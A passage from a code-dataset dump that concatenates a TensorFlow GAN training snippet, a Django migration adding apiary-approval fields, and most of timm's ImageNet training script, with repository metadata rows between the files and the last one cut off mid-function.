# TODO: Pick up here
def _epoch_f(
training_data: tf.data.Dataset,
train_steps_per_epoch: int,
train_step_f: Callable,
testing_data: tf.data.Dataset,
test_steps_per_epoch: int,
test_step_f: Callable,
epoch_idx: int
) -> None:
print("Epoch: ", epoch_idx)
start_time = time.time()
training_finished_predicate = lambda idx: idx == train_steps_per_epoch
train_batch_idx = starmap(train_step_f, enumerate(training_data, start=1))
any(
filter(
training_finished_predicate,
tqdm(
train_batch_idx,
total=train_steps_per_epoch - 1,
desc="Training",
unit="Step",
),
)
)
test_epoch_finished = lambda idx: idx == test_steps_per_epoch
test_batch_idx = starmap(test_step_f, enumerate(testing_data, start=1))
any(
filter(
test_epoch_finished,
tqdm(
test_batch_idx,
total=test_steps_per_epoch - 1,
desc="Testing",
unit="Step",
),
)
)
print(f"\nEpoch completed in {np.round(time.time()-start_time, 2)} seconds")
def config_str_to_dict(config_str: str) -> Dict[str, str]:
"""Converts a Gin.config_str() to a dict for logging with comet.ml"""
predicate = lambda x: len(x) > 0 and not x.startswith("#")
to_kv = lambda x: [l.strip() for l in x.split("=")]
lines = config_str.splitlines()
return {k: v for k, v in map(to_kv, filter(predicate, lines))}
def main(gin_config_file: str) -> None:
gin.parse_config_file(gin_config_file)
gan_training_func() # pylint: disable=no-value-for-parameter
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Model Trainer")
parser.add_argument("config", help="Gin config file with model params.")
args = parser.parse_args()
main(args.config)
| 31 | 88 | 0.667942 |
acdf93786f95a7945c8913e5d9f8076e4683bcb1 | 2,174 | py | Python | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | null | null | null | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | 16 | 2020-03-11T08:25:46.000Z | 2022-03-02T08:14:40.000Z | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | 9 | 2020-01-30T17:37:38.000Z | 2021-09-30T02:22:24.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-07-11 04:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('disturbance', '0266_auto_20210708_1640'),
]
operations = [
migrations.AddField(
model_name='apiarysiteonapproval',
name='approval_cpc_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='approval_minister_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='batch_no',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='catchment',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='cog',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='dra_permit',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='forest_block',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='map_ref',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='roadtrack',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='zone',
field=models.CharField(blank=True, max_length=40, null=True),
),
]
| 32.939394 | 73 | 0.587856 |
acdf93c36badf3f33a6c70907a85aaccc01a41a7 | 41,978 | py | Python | train.py | techthiyanes/pytorch-image-models | fd360ac951a179474917f4b2d21db8669bf87f68 | [
"Apache-2.0"
] | 1 | 2021-12-15T01:16:59.000Z | 2021-12-15T01:16:59.000Z | train.py | jonychoi/pytorch-image-models | e4360e6125bb0bb4279785810c8eb33b40af3ebd | [
"Apache-2.0"
] | null | null | null | train.py | jonychoi/pytorch-image-models | e4360e6125bb0bb4279785810c8eb33b40af3ebd | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
""" ImageNet Training Script
This is intended to be a lean and easily modifiable ImageNet training script that reproduces ImageNet
training results with some of the latest networks and training techniques. It favours canonical PyTorch
and standard Python style over trying to be able to 'do it all.' That said, it offers quite a few speed
and training result improvements over the usual PyTorch example scripts. Repurpose as you see fit.
This script was started from an early version of the PyTorch ImageNet example
(https://github.com/pytorch/examples/tree/master/imagenet)
NVIDIA CUDA specific speedups adopted from NVIDIA Apex examples
(https://github.com/NVIDIA/apex/tree/master/examples/imagenet)
Hacked together by / Copyright 2020 Ross Wightman (https://github.com/rwightman)
"""
import argparse
import time
import yaml
import os
import logging
from collections import OrderedDict
from contextlib import suppress
from datetime import datetime
import torch
import torch.nn as nn
import torchvision.utils
from torch.nn.parallel import DistributedDataParallel as NativeDDP
from timm.data import create_dataset, create_loader, resolve_data_config, Mixup, FastCollateMixup, AugMixDataset
from timm.models import create_model, safe_model_name, resume_checkpoint, load_checkpoint,\
convert_splitbn_model, model_parameters
from timm.utils import setup_default_logging, random_seed, set_jit_fuser, ModelEmaV2,\
get_outdir, CheckpointSaver, distribute_bn, update_summary, accuracy, AverageMeter,\
dispatch_clip_grad, reduce_tensor
from timm.loss import JsdCrossEntropy, BinaryCrossEntropy, SoftTargetCrossEntropy, BinaryCrossEntropy,\
LabelSmoothingCrossEntropy
from timm.optim import create_optimizer_v2, optimizer_kwargs
from timm.scheduler import create_scheduler
from timm.utils import ApexScaler, NativeScaler
try:
from apex import amp
from apex.parallel import DistributedDataParallel as ApexDDP
from apex.parallel import convert_syncbn_model
has_apex = True
except ImportError:
has_apex = False
has_native_amp = False
try:
if getattr(torch.cuda.amp, 'autocast') is not None:
has_native_amp = True
except AttributeError:
pass
try:
import wandb
has_wandb = True
except ImportError:
has_wandb = False
torch.backends.cudnn.benchmark = True
_logger = logging.getLogger('train')
# The first arg parser parses out only the --config argument, this argument is used to
# load a yaml file containing key-values that override the defaults for the main parser below
config_parser = parser = argparse.ArgumentParser(description='Training Config', add_help=False)
parser.add_argument('-c', '--config', default='', type=str, metavar='FILE',
help='YAML config file specifying default arguments')
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
# Dataset parameters
group = parser.add_argument_group('Dataset parameters')
# Keep this argument outside of the dataset group because it is positional.
parser.add_argument('data_dir', metavar='DIR',
help='path to dataset')
group.add_argument('--dataset', '-d', metavar='NAME', default='',
help='dataset type (default: ImageFolder/ImageTar if empty)')
group.add_argument('--train-split', metavar='NAME', default='train',
help='dataset train split (default: train)')
group.add_argument('--val-split', metavar='NAME', default='validation',
help='dataset validation split (default: validation)')
group.add_argument('--dataset-download', action='store_true', default=False,
help='Allow download of dataset for torch/ and tfds/ datasets that support it.')
group.add_argument('--class-map', default='', type=str, metavar='FILENAME',
help='path to class to idx mapping file (default: "")')
# Model parameters
group = parser.add_argument_group('Model parameters')
group.add_argument('--model', default='resnet50', type=str, metavar='MODEL',
help='Name of model to train (default: "resnet50"')
group.add_argument('--pretrained', action='store_true', default=False,
help='Start with pretrained version of specified network (if avail)')
group.add_argument('--initial-checkpoint', default='', type=str, metavar='PATH',
help='Initialize model from this checkpoint (default: none)')
group.add_argument('--resume', default='', type=str, metavar='PATH',
help='Resume full model and optimizer state from checkpoint (default: none)')
group.add_argument('--no-resume-opt', action='store_true', default=False,
help='prevent resume of optimizer state when resuming model')
group.add_argument('--num-classes', type=int, default=None, metavar='N',
help='number of label classes (Model default if None)')
group.add_argument('--gp', default=None, type=str, metavar='POOL',
help='Global pool type, one of (fast, avg, max, avgmax, avgmaxc). Model default if None.')
group.add_argument('--img-size', type=int, default=None, metavar='N',
help='Image patch size (default: None => model default)')
group.add_argument('--input-size', default=None, nargs=3, type=int,
metavar='N N N', help='Input all image dimensions (d h w, e.g. --input-size 3 224 224), uses model default if empty')
group.add_argument('--crop-pct', default=None, type=float,
metavar='N', help='Input image center crop percent (for validation only)')
group.add_argument('--mean', type=float, nargs='+', default=None, metavar='MEAN',
help='Override mean pixel value of dataset')
group.add_argument('--std', type=float, nargs='+', default=None, metavar='STD',
help='Override std deviation of dataset')
group.add_argument('--interpolation', default='', type=str, metavar='NAME',
help='Image resize interpolation type (overrides model)')
group.add_argument('-b', '--batch-size', type=int, default=128, metavar='N',
help='Input batch size for training (default: 128)')
group.add_argument('-vb', '--validation-batch-size', type=int, default=None, metavar='N',
help='Validation batch size override (default: None)')
group.add_argument('--channels-last', action='store_true', default=False,
help='Use channels_last memory layout')
group.add_argument('--torchscript', dest='torchscript', action='store_true',
help='torch.jit.script the full model')
group.add_argument('--fuser', default='', type=str,
help="Select jit fuser. One of ('', 'te', 'old', 'nvfuser')")
group.add_argument('--grad-checkpointing', action='store_true', default=False,
help='Enable gradient checkpointing through model blocks/stages')
# Optimizer parameters
group = parser.add_argument_group('Optimizer parameters')
group.add_argument('--opt', default='sgd', type=str, metavar='OPTIMIZER',
help='Optimizer (default: "sgd"')
group.add_argument('--opt-eps', default=None, type=float, metavar='EPSILON',
help='Optimizer Epsilon (default: None, use opt default)')
group.add_argument('--opt-betas', default=None, type=float, nargs='+', metavar='BETA',
help='Optimizer Betas (default: None, use opt default)')
group.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='Optimizer momentum (default: 0.9)')
group.add_argument('--weight-decay', type=float, default=2e-5,
help='weight decay (default: 2e-5)')
group.add_argument('--clip-grad', type=float, default=None, metavar='NORM',
help='Clip gradient norm (default: None, no clipping)')
group.add_argument('--clip-mode', type=str, default='norm',
help='Gradient clipping mode. One of ("norm", "value", "agc")')
group.add_argument('--layer-decay', type=float, default=None,
help='layer-wise learning rate decay (default: None)')
# Learning rate schedule parameters
group = parser.add_argument_group('Learning rate schedule parameters')
group.add_argument('--sched', default='cosine', type=str, metavar='SCHEDULER',
help='LR scheduler (default: "step"')
group.add_argument('--lr', type=float, default=0.05, metavar='LR',
help='learning rate (default: 0.05)')
group.add_argument('--lr-noise', type=float, nargs='+', default=None, metavar='pct, pct',
help='learning rate noise on/off epoch percentages')
group.add_argument('--lr-noise-pct', type=float, default=0.67, metavar='PERCENT',
help='learning rate noise limit percent (default: 0.67)')
group.add_argument('--lr-noise-std', type=float, default=1.0, metavar='STDDEV',
help='learning rate noise std-dev (default: 1.0)')
group.add_argument('--lr-cycle-mul', type=float, default=1.0, metavar='MULT',
help='learning rate cycle len multiplier (default: 1.0)')
group.add_argument('--lr-cycle-decay', type=float, default=0.5, metavar='MULT',
help='amount to decay each learning rate cycle (default: 0.5)')
group.add_argument('--lr-cycle-limit', type=int, default=1, metavar='N',
help='learning rate cycle limit, cycles enabled if > 1')
group.add_argument('--lr-k-decay', type=float, default=1.0,
help='learning rate k-decay for cosine/poly (default: 1.0)')
group.add_argument('--warmup-lr', type=float, default=0.0001, metavar='LR',
help='warmup learning rate (default: 0.0001)')
group.add_argument('--min-lr', type=float, default=1e-6, metavar='LR',
help='lower lr bound for cyclic schedulers that hit 0 (1e-5)')
group.add_argument('--epochs', type=int, default=300, metavar='N',
help='number of epochs to train (default: 300)')
group.add_argument('--epoch-repeats', type=float, default=0., metavar='N',
help='epoch repeat multiplier (number of times to repeat dataset epoch per train epoch).')
group.add_argument('--start-epoch', default=None, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
group.add_argument('--decay-milestones', default=[30, 60], type=int, nargs='+', metavar="MILESTONES",
help='list of decay epoch indices for multistep lr. must be increasing')
group.add_argument('--decay-epochs', type=float, default=100, metavar='N',
help='epoch interval to decay LR')
group.add_argument('--warmup-epochs', type=int, default=3, metavar='N',
help='epochs to warmup LR, if scheduler supports')
group.add_argument('--cooldown-epochs', type=int, default=10, metavar='N',
help='epochs to cooldown LR at min_lr, after cyclic schedule ends')
group.add_argument('--patience-epochs', type=int, default=10, metavar='N',
help='patience epochs for Plateau LR scheduler (default: 10')
group.add_argument('--decay-rate', '--dr', type=float, default=0.1, metavar='RATE',
help='LR decay rate (default: 0.1)')
# Augmentation & regularization parameters
group = parser.add_argument_group('Augmentation and regularization parameters')
group.add_argument('--no-aug', action='store_true', default=False,
help='Disable all training augmentation, override other train aug args')
group.add_argument('--scale', type=float, nargs='+', default=[0.08, 1.0], metavar='PCT',
help='Random resize scale (default: 0.08 1.0)')
group.add_argument('--ratio', type=float, nargs='+', default=[3./4., 4./3.], metavar='RATIO',
help='Random resize aspect ratio (default: 0.75 1.33)')
group.add_argument('--hflip', type=float, default=0.5,
help='Horizontal flip training aug probability')
group.add_argument('--vflip', type=float, default=0.,
help='Vertical flip training aug probability')
group.add_argument('--color-jitter', type=float, default=0.4, metavar='PCT',
help='Color jitter factor (default: 0.4)')
group.add_argument('--aa', type=str, default=None, metavar='NAME',
help='Use AutoAugment policy. "v0" or "original". (default: None)'),
group.add_argument('--aug-repeats', type=float, default=0,
help='Number of augmentation repetitions (distributed training only) (default: 0)')
group.add_argument('--aug-splits', type=int, default=0,
help='Number of augmentation splits (default: 0, valid: 0 or >=2)')
group.add_argument('--jsd-loss', action='store_true', default=False,
help='Enable Jensen-Shannon Divergence + CE loss. Use with `--aug-splits`.')
group.add_argument('--bce-loss', action='store_true', default=False,
help='Enable BCE loss w/ Mixup/CutMix use.')
group.add_argument('--bce-target-thresh', type=float, default=None,
help='Threshold for binarizing softened BCE targets (default: None, disabled)')
group.add_argument('--reprob', type=float, default=0., metavar='PCT',
help='Random erase prob (default: 0.)')
group.add_argument('--remode', type=str, default='pixel',
help='Random erase mode (default: "pixel")')
group.add_argument('--recount', type=int, default=1,
help='Random erase count (default: 1)')
group.add_argument('--resplit', action='store_true', default=False,
help='Do not random erase first (clean) augmentation split')
group.add_argument('--mixup', type=float, default=0.0,
help='mixup alpha, mixup enabled if > 0. (default: 0.)')
group.add_argument('--cutmix', type=float, default=0.0,
help='cutmix alpha, cutmix enabled if > 0. (default: 0.)')
group.add_argument('--cutmix-minmax', type=float, nargs='+', default=None,
help='cutmix min/max ratio, overrides alpha and enables cutmix if set (default: None)')
group.add_argument('--mixup-prob', type=float, default=1.0,
help='Probability of performing mixup or cutmix when either/both is enabled')
group.add_argument('--mixup-switch-prob', type=float, default=0.5,
help='Probability of switching to cutmix when both mixup and cutmix enabled')
group.add_argument('--mixup-mode', type=str, default='batch',
help='How to apply mixup/cutmix params. Per "batch", "pair", or "elem"')
group.add_argument('--mixup-off-epoch', default=0, type=int, metavar='N',
help='Turn off mixup after this epoch, disabled if 0 (default: 0)')
group.add_argument('--smoothing', type=float, default=0.1,
help='Label smoothing (default: 0.1)')
group.add_argument('--train-interpolation', type=str, default='random',
help='Training interpolation (random, bilinear, bicubic default: "random")')
group.add_argument('--drop', type=float, default=0.0, metavar='PCT',
help='Dropout rate (default: 0.)')
group.add_argument('--drop-connect', type=float, default=None, metavar='PCT',
help='Drop connect rate, DEPRECATED, use drop-path (default: None)')
group.add_argument('--drop-path', type=float, default=None, metavar='PCT',
help='Drop path rate (default: None)')
group.add_argument('--drop-block', type=float, default=None, metavar='PCT',
help='Drop block rate (default: None)')
# Batch norm parameters (only works with gen_efficientnet based models currently)
group = parser.add_argument_group('Batch norm parameters', 'Only works with gen_efficientnet based models currently.')
group.add_argument('--bn-momentum', type=float, default=None,
help='BatchNorm momentum override (if not None)')
group.add_argument('--bn-eps', type=float, default=None,
help='BatchNorm epsilon override (if not None)')
group.add_argument('--sync-bn', action='store_true',
help='Enable NVIDIA Apex or Torch synchronized BatchNorm.')
group.add_argument('--dist-bn', type=str, default='reduce',
help='Distribute BatchNorm stats between nodes after each epoch ("broadcast", "reduce", or "")')
group.add_argument('--split-bn', action='store_true',
help='Enable separate BN layers per augmentation split.')
# Model Exponential Moving Average
group = parser.add_argument_group('Model exponential moving average parameters')
group.add_argument('--model-ema', action='store_true', default=False,
help='Enable tracking moving average of model weights')
group.add_argument('--model-ema-force-cpu', action='store_true', default=False,
help='Force ema to be tracked on CPU, rank=0 node only. Disables EMA validation.')
group.add_argument('--model-ema-decay', type=float, default=0.9998,
help='decay factor for model weights moving average (default: 0.9998)')
# Misc
group = parser.add_argument_group('Miscellaneous parameters')
group.add_argument('--seed', type=int, default=42, metavar='S',
help='random seed (default: 42)')
group.add_argument('--worker-seeding', type=str, default='all',
help='worker seed mode (default: all)')
group.add_argument('--log-interval', type=int, default=50, metavar='N',
help='how many batches to wait before logging training status')
group.add_argument('--recovery-interval', type=int, default=0, metavar='N',
help='how many batches to wait before writing recovery checkpoint')
group.add_argument('--checkpoint-hist', type=int, default=10, metavar='N',
help='number of checkpoints to keep (default: 10)')
group.add_argument('-j', '--workers', type=int, default=4, metavar='N',
help='how many training processes to use (default: 4)')
group.add_argument('--save-images', action='store_true', default=False,
help='save images of input bathes every log interval for debugging')
group.add_argument('--amp', action='store_true', default=False,
help='use NVIDIA Apex AMP or Native AMP for mixed precision training')
group.add_argument('--apex-amp', action='store_true', default=False,
help='Use NVIDIA Apex AMP mixed precision')
group.add_argument('--native-amp', action='store_true', default=False,
help='Use Native Torch AMP mixed precision')
group.add_argument('--no-ddp-bb', action='store_true', default=False,
help='Force broadcast buffers for native DDP to off.')
group.add_argument('--pin-mem', action='store_true', default=False,
help='Pin CPU memory in DataLoader for more efficient (sometimes) transfer to GPU.')
group.add_argument('--no-prefetcher', action='store_true', default=False,
help='disable fast prefetcher')
group.add_argument('--output', default='', type=str, metavar='PATH',
help='path to output folder (default: none, current dir)')
group.add_argument('--experiment', default='', type=str, metavar='NAME',
help='name of train experiment, name of sub-folder for output')
group.add_argument('--eval-metric', default='top1', type=str, metavar='EVAL_METRIC',
help='Best metric (default: "top1"')
group.add_argument('--tta', type=int, default=0, metavar='N',
help='Test/inference time augmentation (oversampling) factor. 0=None (default: 0)')
group.add_argument("--local_rank", default=0, type=int)
group.add_argument('--use-multi-epochs-loader', action='store_true', default=False,
help='use the multi-epochs-loader to save time at the beginning of every epoch')
group.add_argument('--log-wandb', action='store_true', default=False,
help='log training and validation metrics to wandb')
def _parse_args():
# Do we have a config file to parse?
args_config, remaining = config_parser.parse_known_args()
if args_config.config:
with open(args_config.config, 'r') as f:
cfg = yaml.safe_load(f)
parser.set_defaults(**cfg)
# The main arg parser parses the rest of the args, the usual
# defaults will have been overridden if config file specified.
args = parser.parse_args(remaining)
# Cache the args as a text string to save them in the output dir later
args_text = yaml.safe_dump(args.__dict__, default_flow_style=False)
return args, args_text
def main():
setup_default_logging()
args, args_text = _parse_args()
if args.log_wandb:
if has_wandb:
wandb.init(project=args.experiment, config=args)
else:
_logger.warning("You've requested to log metrics to wandb but package not found. "
"Metrics not being logged to wandb, try `pip install wandb`")
args.prefetcher = not args.no_prefetcher
args.distributed = False
if 'WORLD_SIZE' in os.environ:
args.distributed = int(os.environ['WORLD_SIZE']) > 1
args.device = 'cuda:0'
args.world_size = 1
args.rank = 0 # global rank
if args.distributed:
args.device = 'cuda:%d' % args.local_rank
torch.cuda.set_device(args.local_rank)
torch.distributed.init_process_group(backend='nccl', init_method='env://')
args.world_size = torch.distributed.get_world_size()
args.rank = torch.distributed.get_rank()
_logger.info('Training in distributed mode with multiple processes, 1 GPU per process. Process %d, total %d.'
% (args.rank, args.world_size))
else:
_logger.info('Training with a single process on 1 GPUs.')
assert args.rank >= 0
# resolve AMP arguments based on PyTorch / Apex availability
use_amp = None
if args.amp:
# `--amp` chooses native amp before apex (APEX ver not actively maintained)
if has_native_amp:
args.native_amp = True
elif has_apex:
args.apex_amp = True
if args.apex_amp and has_apex:
use_amp = 'apex'
elif args.native_amp and has_native_amp:
use_amp = 'native'
elif args.apex_amp or args.native_amp:
_logger.warning("Neither APEX or native Torch AMP is available, using float32. "
"Install NVIDA apex or upgrade to PyTorch 1.6")
random_seed(args.seed, args.rank)
if args.fuser:
set_jit_fuser(args.fuser)
model = create_model(
args.model,
pretrained=args.pretrained,
num_classes=args.num_classes,
drop_rate=args.drop,
drop_connect_rate=args.drop_connect, # DEPRECATED, use drop_path
drop_path_rate=args.drop_path,
drop_block_rate=args.drop_block,
global_pool=args.gp,
bn_momentum=args.bn_momentum,
bn_eps=args.bn_eps,
scriptable=args.torchscript,
checkpoint_path=args.initial_checkpoint)
if args.num_classes is None:
assert hasattr(model, 'num_classes'), 'Model must have `num_classes` attr if not set on cmd line/config.'
args.num_classes = model.num_classes # FIXME handle model default vs config num_classes more elegantly
if args.grad_checkpointing:
model.set_grad_checkpointing(enable=True)
if args.local_rank == 0:
_logger.info(
f'Model {safe_model_name(args.model)} created, param count:{sum([m.numel() for m in model.parameters()])}')
data_config = resolve_data_config(vars(args), model=model, verbose=args.local_rank == 0)
# setup augmentation batch splits for contrastive loss or split bn
num_aug_splits = 0
if args.aug_splits > 0:
assert args.aug_splits > 1, 'A split of 1 makes no sense'
num_aug_splits = args.aug_splits
# enable split bn (separate bn stats per batch-portion)
if args.split_bn:
assert num_aug_splits > 1 or args.resplit
model = convert_splitbn_model(model, max(num_aug_splits, 2))
# move model to GPU, enable channels last layout if set
model.cuda()
if args.channels_last:
model = model.to(memory_format=torch.channels_last)
# setup synchronized BatchNorm for distributed training
if args.distributed and args.sync_bn:
assert not args.split_bn
if has_apex and use_amp == 'apex':
# Apex SyncBN preferred unless native amp is activated
model = convert_syncbn_model(model)
else:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)
if args.local_rank == 0:
_logger.info(
'Converted model to use Synchronized BatchNorm. WARNING: You may have issues if using '
'zero initialized BN layers (enabled by default for ResNets) while sync-bn enabled.')
if args.torchscript:
assert not use_amp == 'apex', 'Cannot use APEX AMP with torchscripted model'
assert not args.sync_bn, 'Cannot use SyncBatchNorm with torchscripted model'
model = torch.jit.script(model)
optimizer = create_optimizer_v2(model, **optimizer_kwargs(cfg=args))
# setup automatic mixed-precision (AMP) loss scaling and op casting
amp_autocast = suppress # do nothing
loss_scaler = None
if use_amp == 'apex':
model, optimizer = amp.initialize(model, optimizer, opt_level='O1')
loss_scaler = ApexScaler()
if args.local_rank == 0:
_logger.info('Using NVIDIA APEX AMP. Training in mixed precision.')
elif use_amp == 'native':
amp_autocast = torch.cuda.amp.autocast
loss_scaler = NativeScaler()
if args.local_rank == 0:
_logger.info('Using native Torch AMP. Training in mixed precision.')
else:
if args.local_rank == 0:
_logger.info('AMP not enabled. Training in float32.')
# optionally resume from a checkpoint
resume_epoch = None
if args.resume:
resume_epoch = resume_checkpoint(
model, args.resume,
optimizer=None if args.no_resume_opt else optimizer,
loss_scaler=None if args.no_resume_opt else loss_scaler,
log_info=args.local_rank == 0)
# setup exponential moving average of model weights, SWA could be used here too
model_ema = None
if args.model_ema:
# Important to create EMA model after cuda(), DP wrapper, and AMP but before DDP wrapper
model_ema = ModelEmaV2(
model, decay=args.model_ema_decay, device='cpu' if args.model_ema_force_cpu else None)
if args.resume:
load_checkpoint(model_ema.module, args.resume, use_ema=True)
# setup distributed training
if args.distributed:
if has_apex and use_amp == 'apex':
# Apex DDP preferred unless native amp is activated
if args.local_rank == 0:
_logger.info("Using NVIDIA APEX DistributedDataParallel.")
model = ApexDDP(model, delay_allreduce=True)
else:
if args.local_rank == 0:
_logger.info("Using native Torch DistributedDataParallel.")
model = NativeDDP(model, device_ids=[args.local_rank], broadcast_buffers=not args.no_ddp_bb)
# NOTE: EMA model does not need to be wrapped by DDP
# setup learning rate schedule and starting epoch
lr_scheduler, num_epochs = create_scheduler(args, optimizer)
start_epoch = 0
if args.start_epoch is not None:
# a specified start_epoch will always override the resume epoch
start_epoch = args.start_epoch
elif resume_epoch is not None:
start_epoch = resume_epoch
if lr_scheduler is not None and start_epoch > 0:
lr_scheduler.step(start_epoch)
if args.local_rank == 0:
_logger.info('Scheduled epochs: {}'.format(num_epochs))
# create the train and eval datasets
dataset_train = create_dataset(
args.dataset, root=args.data_dir, split=args.train_split, is_training=True,
class_map=args.class_map,
download=args.dataset_download,
batch_size=args.batch_size,
repeats=args.epoch_repeats)
dataset_eval = create_dataset(
args.dataset, root=args.data_dir, split=args.val_split, is_training=False,
class_map=args.class_map,
download=args.dataset_download,
batch_size=args.batch_size)
# setup mixup / cutmix
collate_fn = None
mixup_fn = None
mixup_active = args.mixup > 0 or args.cutmix > 0. or args.cutmix_minmax is not None
if mixup_active:
mixup_args = dict(
mixup_alpha=args.mixup, cutmix_alpha=args.cutmix, cutmix_minmax=args.cutmix_minmax,
prob=args.mixup_prob, switch_prob=args.mixup_switch_prob, mode=args.mixup_mode,
label_smoothing=args.smoothing, num_classes=args.num_classes)
if args.prefetcher:
assert not num_aug_splits # collate conflict (need to support deinterleaving in collate mixup)
collate_fn = FastCollateMixup(**mixup_args)
else:
mixup_fn = Mixup(**mixup_args)
# wrap dataset in AugMix helper
if num_aug_splits > 1:
dataset_train = AugMixDataset(dataset_train, num_splits=num_aug_splits)
# create data loaders w/ augmentation pipeiine
train_interpolation = args.train_interpolation
if args.no_aug or not train_interpolation:
train_interpolation = data_config['interpolation']
loader_train = create_loader(
dataset_train,
input_size=data_config['input_size'],
batch_size=args.batch_size,
is_training=True,
use_prefetcher=args.prefetcher,
no_aug=args.no_aug,
re_prob=args.reprob,
re_mode=args.remode,
re_count=args.recount,
re_split=args.resplit,
scale=args.scale,
ratio=args.ratio,
hflip=args.hflip,
vflip=args.vflip,
color_jitter=args.color_jitter,
auto_augment=args.aa,
num_aug_repeats=args.aug_repeats,
num_aug_splits=num_aug_splits,
interpolation=train_interpolation,
mean=data_config['mean'],
std=data_config['std'],
num_workers=args.workers,
distributed=args.distributed,
collate_fn=collate_fn,
pin_memory=args.pin_mem,
use_multi_epochs_loader=args.use_multi_epochs_loader,
worker_seeding=args.worker_seeding,
)
loader_eval = create_loader(
dataset_eval,
input_size=data_config['input_size'],
batch_size=args.validation_batch_size or args.batch_size,
is_training=False,
use_prefetcher=args.prefetcher,
interpolation=data_config['interpolation'],
mean=data_config['mean'],
std=data_config['std'],
num_workers=args.workers,
distributed=args.distributed,
crop_pct=data_config['crop_pct'],
pin_memory=args.pin_mem,
)
# setup loss function
if args.jsd_loss:
assert num_aug_splits > 1 # JSD only valid with aug splits set
train_loss_fn = JsdCrossEntropy(num_splits=num_aug_splits, smoothing=args.smoothing)
elif mixup_active:
# smoothing is handled with mixup target transform which outputs sparse, soft targets
if args.bce_loss:
train_loss_fn = BinaryCrossEntropy(target_threshold=args.bce_target_thresh)
else:
train_loss_fn = SoftTargetCrossEntropy()
elif args.smoothing:
if args.bce_loss:
train_loss_fn = BinaryCrossEntropy(smoothing=args.smoothing, target_threshold=args.bce_target_thresh)
else:
train_loss_fn = LabelSmoothingCrossEntropy(smoothing=args.smoothing)
else:
train_loss_fn = nn.CrossEntropyLoss()
train_loss_fn = train_loss_fn.cuda()
validate_loss_fn = nn.CrossEntropyLoss().cuda()
# setup checkpoint saver and eval metric tracking
eval_metric = args.eval_metric
best_metric = None
best_epoch = None
saver = None
output_dir = None
if args.rank == 0:
if args.experiment:
exp_name = args.experiment
else:
exp_name = '-'.join([
datetime.now().strftime("%Y%m%d-%H%M%S"),
safe_model_name(args.model),
str(data_config['input_size'][-1])
])
output_dir = get_outdir(args.output if args.output else './output/train', exp_name)
decreasing = True if eval_metric == 'loss' else False
saver = CheckpointSaver(
model=model, optimizer=optimizer, args=args, model_ema=model_ema, amp_scaler=loss_scaler,
checkpoint_dir=output_dir, recovery_dir=output_dir, decreasing=decreasing, max_history=args.checkpoint_hist)
with open(os.path.join(output_dir, 'args.yaml'), 'w') as f:
f.write(args_text)
try:
for epoch in range(start_epoch, num_epochs):
if args.distributed and hasattr(loader_train.sampler, 'set_epoch'):
loader_train.sampler.set_epoch(epoch)
train_metrics = train_one_epoch(
epoch, model, loader_train, optimizer, train_loss_fn, args,
lr_scheduler=lr_scheduler, saver=saver, output_dir=output_dir,
amp_autocast=amp_autocast, loss_scaler=loss_scaler, model_ema=model_ema, mixup_fn=mixup_fn)
if args.distributed and args.dist_bn in ('broadcast', 'reduce'):
if args.local_rank == 0:
_logger.info("Distributing BatchNorm running means and vars")
distribute_bn(model, args.world_size, args.dist_bn == 'reduce')
eval_metrics = validate(model, loader_eval, validate_loss_fn, args, amp_autocast=amp_autocast)
if model_ema is not None and not args.model_ema_force_cpu:
if args.distributed and args.dist_bn in ('broadcast', 'reduce'):
distribute_bn(model_ema, args.world_size, args.dist_bn == 'reduce')
ema_eval_metrics = validate(
model_ema.module, loader_eval, validate_loss_fn, args, amp_autocast=amp_autocast, log_suffix=' (EMA)')
eval_metrics = ema_eval_metrics
if lr_scheduler is not None:
# step LR for next epoch
lr_scheduler.step(epoch + 1, eval_metrics[eval_metric])
if output_dir is not None:
update_summary(
epoch, train_metrics, eval_metrics, os.path.join(output_dir, 'summary.csv'),
write_header=best_metric is None, log_wandb=args.log_wandb and has_wandb)
if saver is not None:
# save proper checkpoint with eval metric
save_metric = eval_metrics[eval_metric]
best_metric, best_epoch = saver.save_checkpoint(epoch, metric=save_metric)
except KeyboardInterrupt:
pass
if best_metric is not None:
_logger.info('*** Best metric: {0} (epoch {1})'.format(best_metric, best_epoch))
def train_one_epoch(
epoch, model, loader, optimizer, loss_fn, args,
lr_scheduler=None, saver=None, output_dir=None, amp_autocast=suppress,
loss_scaler=None, model_ema=None, mixup_fn=None):
if args.mixup_off_epoch and epoch >= args.mixup_off_epoch:
if args.prefetcher and loader.mixup_enabled:
loader.mixup_enabled = False
elif mixup_fn is not None:
mixup_fn.mixup_enabled = False
second_order = hasattr(optimizer, 'is_second_order') and optimizer.is_second_order
batch_time_m = AverageMeter()
data_time_m = AverageMeter()
losses_m = AverageMeter()
model.train()
end = time.time()
last_idx = len(loader) - 1
num_updates = epoch * len(loader)
for batch_idx, (input, target) in enumerate(loader):
